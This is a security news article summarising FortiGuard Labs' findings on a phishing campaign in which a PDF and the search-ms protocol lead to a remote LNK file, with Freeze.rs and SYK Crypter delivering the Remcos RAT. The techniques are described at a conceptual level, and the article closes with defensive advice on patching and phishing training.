Freeze[.]rs, a Rust-based injector, has been employed as a tool to launch a sophisticated phishing campaign that delivers malware to its targets. The campaign, discovered by Fortinet’s FortiGuard Labs in July, has been targeting victims in Europe and North America, particularly in the specialty chemical and industrial product supplier sectors. The attackers have successfully bypassed endpoint detection and response (EDR) using a malicious PDF file.
Upon further investigation, FortiGuard Labs discovered that the phishing campaign involved the use of a tool called SYK Crypter, which is commonly used to distribute malware via the Discord community chat platform. The tool was responsible for loading a remote access Trojan (RAT) known as Remcos, which is capable of controlling and monitoring Windows devices.
The key element of this attack chain is the Freeze[.]rs injector, a Red Team tool designed to create payloads that can bypass EDR security measures. The tool utilizes the ‘search-ms’ protocol to access an LNK file on a remote server. Clicking on the LNK file triggers a PowerShell script that executes Freeze[.]rs and SYK Crypter, allowing for further offensive actions.
Cara Lin, a researcher at FortiGuard Labs, explains that the Freeze[.]rs injector uses NT syscalls to inject shellcode, avoiding the standard calls that are usually monitored by EDR. By creating a process in a suspended state, the attacker ensures that minimal DLLs are loaded, including no EDR-specific DLLs. This allows the syscalls within Ntdll.dll to remain unaltered, evading EDR detection.
The attack chain begins with a booby-trapped PDF file that works in conjunction with the ‘search-ms’ protocol to deliver the payload. A JavaScript code is utilized to utilize the functionality of ‘search-ms’ and reveal the LNK file located on a remote server. The LNK file, disguised as a PDF icon, tricks victims into believing that it originates from their own system and is legitimate.
Additionally, the SYK Crypter plays a role in ensuring persistence by copying itself to the Startup folder. It encrypts the configuration and the compressed payload to obfuscate its malicious activities. The attackers employ a multi-layered strategy involving encoding, string obfuscation, and payload encryption to hinder static analysis. The malware can also terminate itself if it detects the presence of a specific security vendor.
Phishing attacks continue to be a pervasive threat, with a high percentage of companies experiencing at least one email phishing attack in the past year. The tactics used in these attacks have become more sophisticated, adapting to new technology and user behavior. The research emphasizes the importance of maintaining up-to-date software, providing regular training to employees, and utilizing advanced security tools to defend against evolving phishing attacks.
It is notable that phishing simulation training appears to be more effective in critical infrastructure organizations compared to other sectors. Employees who receive such training are more likely to correctly identify and report malicious email attacks. This highlights the need for ongoing education and awareness programs to mitigate the risks posed by phishing attacks.